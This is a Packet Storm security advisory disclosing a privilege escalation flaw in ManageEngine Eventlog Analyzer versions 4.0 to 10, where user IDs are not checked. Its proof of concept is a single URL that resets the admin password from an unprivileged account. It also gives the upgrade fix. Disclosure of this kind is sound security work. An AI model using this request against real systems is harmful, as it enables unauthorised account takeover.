ManageEngine Eventlog Analyzer versions 4.0 through 10 suffer from a privilege escalation vulnerability.
034c23483e09b9bbd65889d639878efb6d10683ad57d5d65f664f30bd1ef86d5# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage:http://www.manageengine.com
# Version: 4.0 - 10
1. Description:
The manageengine eventlog analyzer fails to properly verify user
privileges when making changes via the userManagementForm.do. An
unprivileged user would be allowed to make changes to any account by
changing the USER_ID field to a number corresponding to another user.
Testing discovered that the default admin and guest accounts are 1 and 2.
Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software including current, are vulnerable. According
to the vendor this is fixed in version 10.8.
2) Proof of Concept
-login as an unprivileged user
-Use the following URL to change the admin password to "admin"
http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin
3 Solution:
Upgrade to 10.8
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed